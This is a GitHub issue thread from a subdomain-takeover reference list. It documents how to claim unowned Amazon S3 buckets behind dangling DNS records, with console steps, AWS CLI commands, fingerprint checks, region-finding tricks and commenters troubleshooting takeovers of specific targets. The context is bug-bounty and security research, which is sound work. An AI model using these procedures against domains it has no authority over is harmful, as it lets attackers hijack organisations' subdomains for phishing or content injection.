EdOverflow / can-i-take-over-xyz

"Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records.

Amazon S3 proofs

PatrikHudak opened this issue · comments

Service name

Amazon (AWS) S3

Proof

The Amazon S3 service is indeed vulnerable. Amazon S3 follows much the same virtual-hosting concept as other cloud providers. S3 buckets can be configured for website hosting to serve static content like a web server. If the canonical domain name contains "website", the bucket is configured as website hosting. I suspect that non-website and website-configured buckets are handled by separate load balancers, and therefore they do not work interchangeably. The only difference during the takeover is at bucket creation, where the correct website flag needs to be set if necessary. Step-by-step process (an equivalent AWS CLI sketch follows the list):

  1. Go to S3 panel
  2. Click Create Bucket
  3. Set Bucket name to source domain name (i.e., the domain you want to take over)
  4. Click Next multiple times to finish
  5. Open the created bucket
  6. Click Upload
  7. Select the file which will be used for the PoC (an HTML or TXT file). I recommend naming it something other than index.html; you can use poc (without extension)
  8. In the Permissions tab, select Grant public read access to this object(s)
  9. After upload, select the file and click More -> Change metadata
  10. Click Add metadata, select Content-Type, and set the value to reflect the type of document. If HTML, choose text/html, etc.
  11. (Optional) If the bucket was configured as a website
    1. Switch to Properties tab
    2. Click Static website hosting
    3. Select Use this bucket to host a website
    4. As an index, choose the file that you uploaded
    5. Click Save
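
For reference, roughly the same flow can be scripted with the AWS CLI. A minimal sketch, assuming the dangling record is sub.example.com and the target region is eu-west-1 (both placeholders); on newer accounts, Block Public Access and Object Ownership settings may need to be relaxed before the public-read ACL takes effect:

aws s3api create-bucket --bucket sub.example.com --region eu-west-1 --create-bucket-configuration LocationConstraint=eu-west-1   # omit the LocationConstraint for us-east-1
aws s3 cp poc s3://sub.example.com/poc --content-type text/html --acl public-read   # upload the PoC file and make it publicly readable
aws s3 website s3://sub.example.com/ --index-document poc   # only if the original CNAME was an s3-website endpoint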

To verify the domain, I run:

http -b GET http://{SOURCE DOMAIN NAME} | grep -E -q '<Code>NoSuchBucket</Code>|<li>Code: NoSuchBucket</li>' && echo "Subdomain takeover may be possible" || echo "Subdomain takeover is not possible"

Note that there are two possible error pages depending on the bucket settings (set as website hosting or not).
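
If httpie is not available, an equivalent check with curl should behave the same way (a sketch; {SOURCE DOMAIN NAME} is the candidate subdomain):

curl -s http://{SOURCE DOMAIN NAME} | grep -E -q '<Code>NoSuchBucket</Code>|<li>Code: NoSuchBucket</li>' && echo "Subdomain takeover may be possible" || echo "Subdomain takeover is not possible"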

Some reports on H1 claiming S3 buckets:

Documentation

There are several formats of domains that Amazon uses for S3 (RegExp):

  • ^[a-z0-9\.\-]{0,63}\.?s3.amazonaws\.com$
  • ^[a-z0-9\.\-]{0,63}\.?s3-website[\.-](eu|ap|us|ca|sa|cn)-\w{2,14}-\d{1,2}\.amazonaws.com(\.cn)?$
  • ^[a-z0-9\.\-]{0,63}\.?s3[\.-](eu|ap|us|ca|sa)-\w{2,14}-\d{1,2}\.amazonaws.com$
  • ^[a-z0-9\.\-]{0,63}\.?s3.dualstack\.(eu|ap|us|ca|sa)-\w{2,14}-\d{1,2}\.amazonaws.com$

Note that there are cases where only the raw domain (e.g. s3.amazonaws.com) is included in the CNAME and a takeover is still possible.

(Documentation taken from https://0xpatrik.com/takeover-proofs/)
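
As a quick way to tell whether a resolved CNAME matches one of the patterns above, something like the following can be used (a sketch; sub.example.com is a placeholder and only the first, region-less pattern is checked):

cname=$(dig +short CNAME sub.example.com | sed 's/\.$//')   # resolve the CNAME and strip the trailing dot
echo "$cname" | grep -E -q '^[a-z0-9.-]{0,63}\.?s3\.amazonaws\.com$' && echo "CNAME points to an S3 endpoint"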

I've come across a sub-domain which returns the error message:

NoSuchBucket
The specified bucket does not exist
randombucket-assets

When I use the dig command, the CNAME points to a random .cloudfront.net URL.

When I try to follow the above steps, I get the message below while creating the S3 bucket with the same name:
"Bucket name already exists"

I'm entering the full sub-domain name in the bucket name. Am I missing something to check?

Update: I've been able to find the S3 bucket URL: subdomain.s3.amazonaws.com

id 64053
opcode QUERY
rcode NOERROR
flags QR RD RA
;QUESTION
girishsarwal.me. IN CNAME
;ANSWER
;AUTHORITY
something.me. 899 IN SOA ns-732.awsdns-27.net. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400
;ADDITIONAL

For this S3 bucket, I'm facing this problem. What's the solution for this?

@soynek You're going to need to dig into the documentation for this one, we've had to draw the line at this repository being treated like a support desk. This is here to outline the work people have contributed back, and to outline vulnerable areas, but if you have a specific subdomain takeover question then the documentation for that service is where you should be looking.

@codingo
I want to take over a subdomain and I'm facing the problem shown in the picture. Any solution for this?

Hi
I found a domain with a CNAME of *.cloudfront.net.
When I access it from a browser it returns an empty response. I tried to claim it as a bucket using the steps above and it was added successfully, but when I access it, it's still empty. I tried other subdomains from the same domain but they say 'Bucket name already exists'.
Please explain this to me.

@yoursquad13 Because *.cloudfront.net is not an S3 domain.

Hi, during a bug bounty engagement I found a subdomain vulnerable to takeover. The dig command returns this information:
sub.example.com CNAME [bucket_name].s3.amazonaws.com
and then:
[bucket_name].s3.amazonaws.com CNAME s3-1-w.amazonaws.com
I don't get any region information from the dig command.

Also, if I visit the page, I get an XML error (see the attached screenshot).

The subdomain would seem vulnerable to takeover, but when I go to create the bucket from my AWS console, I get the following error:
Bucket name already exists

Can anyone help me?
Thank you!

@webliqui
Any news on this issue? I am running into the same thing

Have you tried the AWS CLI, e.g. aws s3 ls <bucket_name>? I think this command searches all regions for a bucket name.

@webliqui Did you find something?
I'm facing the same issue.
@codingo Do you have a solution for this?

same issue as @webliqui. @codingo?

I believe, as I mentioned above, this issue is related to the region. The bucket may not have been created in the region that you are testing in. But if you use the AWS CLI (aws s3 ls <bucket_name>), I believe you will find the bucket. I suggest testing with the AWS CLI.
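
For example, a couple of hedged checks along these lines can tell whether the name is taken anywhere at all (<bucket_name> is a placeholder; the exact error depends on the bucket's permissions):

aws s3 ls s3://<bucket_name>   # "NoSuchBucket" means the name is free; "AccessDenied"/"AllAccessDisabled" means it exists under another account
aws s3api head-bucket --bucket <bucket_name>   # a 404 generally means no such bucket; a 403 means it exists but you do not own it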

Hi @soareswallace :),
I got the same error, and when I execute the command you suggested in your latest reply, I get this error: An error occurred (AllAccessDisabled) when calling the ListObjectsV2 operation: All access to this object has been disabled ... any tip to make the takeover possible?

Regards,
Mik

I believe that when we get this message, @Mik317, the takeover is not possible. This message shows that the bucket does exist and has an owner.

Stay safe,

Wallace

Hi @soareswallace :).
Thanks for the reply. Maybe I'll be lucky next time ;)

Until then, stay safe and hack the world ;)

Regards,
Mik

Hi @soareswallace,
I discovered a subdomain whose CNAME points to *.elb.amazonaws.com.
How can I take over this subdomain? Is the process the same as creating an S3 bucket?

Hi @FaizanNehal,

I tried once, but never figured out how to do it. I would also like to know how it can be taken over. Let us know if you discover anything.

Wallace

Does anyone know about Amazon Route 53? Is it vulnerable?

I found a subdomain.domain.com that is vulnerable, and confirmed with dig that the CNAME pointed to an S3 bucket in Virginia.
When I tried creating the bucket with the same name it worked, but the endpoint for the bucket was of the form:
^[a-z0-9\.\-]{0,63}\.?s3-website[\.-](eu|ap|us|ca|sa|cn)-\w{2,14}-\d{1,2}\.amazonaws.com(\.cn)?$
which is mentioned in the documentation, or
^[a-z0-9\.\-]{0,63}\.?s3.amazonaws\.com$/subdomain.domain.com/
which is not.

My question: since it is not mentioned in the steps above, how do I make those endpoints point to subdomain.domain.com?

Is this service still vulnerable?

Not really; usually there is a random number before the ELB name.

Hi,
I have found "The specified bucket does not exist" for a few subdomains, but when I do a dig, the subdomains don't return a CNAME record. So does that mean they are not vulnerable, or am I missing something here?

Did you find any info about taking over *.elb.amazonaws.com?

From what I could find so far, it is not possible to take over Amazon's load balancer.

And as @pdelteil replied above:

Not really; usually there is a random number before the ELB name.

Okay, thanks.

In this case I was able to create the bucket by deleting it and recreating it; it takes time, of course, but it works.

@technicaljunkie which kind?

Hi,

I've got the fingerprint "The specified bucket does not exist". However, when I dig for DNS records using dig +nocmd +noall +answer CNAME sub.domain.com, I get nothing for the CNAME record.

Does it mean some measures have already been taken? Can I take it over?

Thank you in advance

Try ping to learn the region; in the case of a subdomain it won't necessarily work, as you usually can't see it clearly when a firewall is being used.

Do you mean traceroute?

@Sim4n6 No, I mean ping sub.site.com.

Well, both dig and ping got me the IP address, and it is located in Zurich. Now the issue is that the bucket name is unknown.

The CNAME of sub.domain.com does not show a domain of the format ^[a-z0-9.-]{0,63}.?s3.amazonaws.com$,

but curl -v does return the fingerprint.

Update: I've got the bucket name; unfortunately the name is already taken 😕😕

I got this error and solved it in some of my takeovers.

I was checking for subdomain takeover and found an S3 bucket which doesn't exist, and confirmed the takeover with subzy. The problem is that I'm not able to create a bucket with the vulnerable domain name; it says "Bucket with the same name already exists". So how can I take over this bucket?

It could possibly be a honeypot; I saw the same on one target. Otherwise, confirm the bucket name you are entering, because sometimes it's not the same as the host URL.

@soynek did you ever find a solution to this? If so, how did you fix it?

Bucket region mismatch; change the region.

In your case, us-west-2 is the region.

@GDATTACKER-RESEARCHER how can you find out which one you need to change to out of the 22 options?

Different ways, depending on the case: by ping, by other buckets the site uses, by the CNAME, etc.
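
Two hedged ways to narrow the region down in practice (sub.example.com and <bucket_name> are placeholders; both only help when the bucket actually exists somewhere):

curl -sI https://<bucket_name>.s3.amazonaws.com | grep -i x-amz-bucket-region   # S3 returns the bucket's region header for existing buckets
host $(dig +short A sub.example.com | tail -n1)   # reverse DNS of the resolved IP often embeds an AWS region name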

Is this vulnerable?
asdasd.target.com shows this

<Error>
<Code>NoSuchBucket</Code>
<Message>The specified bucket does not exist.</Message>
<Resource>/asd</Resource>
<RequestId>uzEH...</RequestId>
</Error>

And DIG shows this:

target.com.       *   IN      NS      ns-*.awsdns-53.net.
target.com.       *   IN      NS      ns-*.awsdns-58.org.
target.com.       *   IN      NS      ns-*.awsdns-23.co.uk.
target.com.       *   IN      NS      ns-*.awsdns-44.com.

* - asterisks stand in for some of the numbers

Yes

Have you tried?

🤣😂 Nice question; I still have about 15 buckets claimed, I guess.

Good for you, thanks for the help!!

Hello everyone,

I can confirm this takeover is still possible. Adding some details:

  • If you get an error like 'the bucket .... already exists', it's not vulnerable.
  • A CNAME pointing to an AWS domain name is not necessary. I took over a bucket that was pointing to several IP addresses. The relevant part is the response fingerprint.
  • The error with Code: IncorrectEndpoint can be fixed by removing the bucket and creating it in another region. It takes around 1 hour for the bucket to be removed; before that you won't be able to create it. Use the AWS CLI to automate this part (a sketch follows this list).
  • If you are getting Access Denied errors, check this guide
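
A minimal sketch of that delete-and-recreate step with the AWS CLI (the bucket name and region are placeholders; the name only becomes usable again once AWS has fully released it):

aws s3 rb s3://sub.example.com --force   # delete the bucket and everything in it
# wait until the name is released (reportedly up to ~1 hour), then recreate it in the other region:
aws s3api create-bucket --bucket sub.example.com --region eu-west-1 --create-bucket-configuration LocationConstraint=eu-west-1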

I'm trying to take over a subdomain via an S3 bucket. When I access the subdomain, e.g. sub.domain.com, it always returns a 403 error, but if I access sub.domain.com/index.html it opens normally. What's the problem?

@radiustama77 AWS has very granular permission controls. Opening sub.domain.com/ needs s3:ListBucket permission which you don't have. However, you do have permission to s3:GetObject so if you can guess the name of the file, you will be able to get it.
Based on the behavior you described, subdomain takeover is not possible. Also, it seems that bucket files are intended to be public based on 'index.html' filename implications. You may try brute-forcing for filenames and see if you get something sensitive (with gobuster for example).
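
A hedged example of that brute-forcing idea (the host and the wordlist path are placeholders):

gobuster dir -u https://sub.domain.com/ -w /usr/share/wordlists/dirb/common.txt   # guess object names that are readable via s3:GetObject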

What I mean is, I have already been able to take over several subdomains. But for some subdomains, whenever I try to access subdomain.example.com it returns a 403 Access Denied error, while subdomain.example.com/index.html works normally.

That's because you have not specified an index document in static website hosting, which you need for the index page. Otherwise it keeps returning a 403 error.

@GDATTACKER-RESEARCHER I already specified the index file in static hosting.
The URL from Amazon S3 also works properly, e.g. subdomain.s3-website-us-east-1.amazonaws.com, but the error still happens when I access it via subdomain.example.com.

It means that the bucket is not available for takeover.

Yes, it is not possible to claim this one, as it's already in use; only the permissions for static hosting have been disabled.

How do I find out the region?

Simply change the region to us-west-2, in your case, for the domain girishsarwal.me.

Yeah, I mean: how do I find out the region of the domain?

Like in this case, how can I get the correct region to create a bucket for these domains?

Simply try the common methods; if that's not possible, you need to change regions every 2 hours or so until you get the right one.

What are the common methods to get the region?

You can also refer to the IP history to find the exact IP range matching your vulnerable domain's IP: https://ip-ranges.amazonaws.com/ip-ranges.json
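
For example, something like this lists the published S3 prefixes with their regions so the resolved IP can be matched against them (a sketch; it requires jq, and the 52.218. pattern is a placeholder for the first octets of the IP you resolved):

curl -s https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixes[] | select(.service=="S3") | "\(.ip_prefix) \(.region)"' | grep '^52\.218\.'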

I checked the IP for my site with ping and then, like you suggested, checked the IP ranges in the Amazon prefixes, but I couldn't work out how to get the region. What if the IP isn't available in the data you sent?

Use the default location of other buckets the website uses, use the IP ranges of the bucket, use the aws-cli to learn the region, etc.

The IP range is available; if you know networking, you should easily find your IP range listed there.

For example, for endpass.com I looked up the IP and got 104.21.37.171, then checked the Amazon IP-range prefixes but still didn't find it. Can you give me some advice?

Why do you need a script for it when you can do it manually?

Hi guys, is this still vulnerable?
I get an error that the bucket name is already taken. 🤔

Hi guys, I found the following scenario:

  1. subdomain.example.com returning NoSuchBucket

  2. dig cname subdomain.example.com returns:

> dig cname subdomain.example.com                                                                   

; <<>> DiG 9.18.12-0ubuntu0.22.04.3-Ubuntu <<>> cname subdomain.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 43658
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 65494
;; QUESTION SECTION:
;subdomain.example.com.	IN	CNAME

;; ANSWER SECTION:
subdomain.example.com. 3600 IN	CNAME	RANDOM_NAME_SEQUENCE.s3.amazonaws.com.

;; Query time: 31 msec
;; SERVER: 127.0.0.53#53(127.0.0.53) (UDP)
;; WHEN: Thu Nov 02 10:55:24 CET 2023
;; MSG SIZE  rcvd: 131
  3. Checked the bucket region with curl -sI RANDOM_NAME_SEQUENCE.s3.amazonaws.com | grep bucket-region

  4. Claimed and created an S3 bucket named RANDOM_NAME_SEQUENCE in the region from the previous step and uploaded a poc to RANDOM_NAME_SEQUENCE.s3.amazonaws.com/poc, making both the bucket and the poc file public.

  5. Navigated to https://RANDOM_NAME_SEQUENCE.s3.amazonaws.com/poc and the file shows properly.

  6. subdomain.example.com/poc still shows NoSuchBucket.

I also tried creating the bucket with static website hosting. Has anyone encountered this scenario, or does anyone know what's happening here?

@six2dez please refer to issue #361; I have faced a similar scenario, hope it will be useful.

Bucket with the same name already exists

Is this an edge case now?

No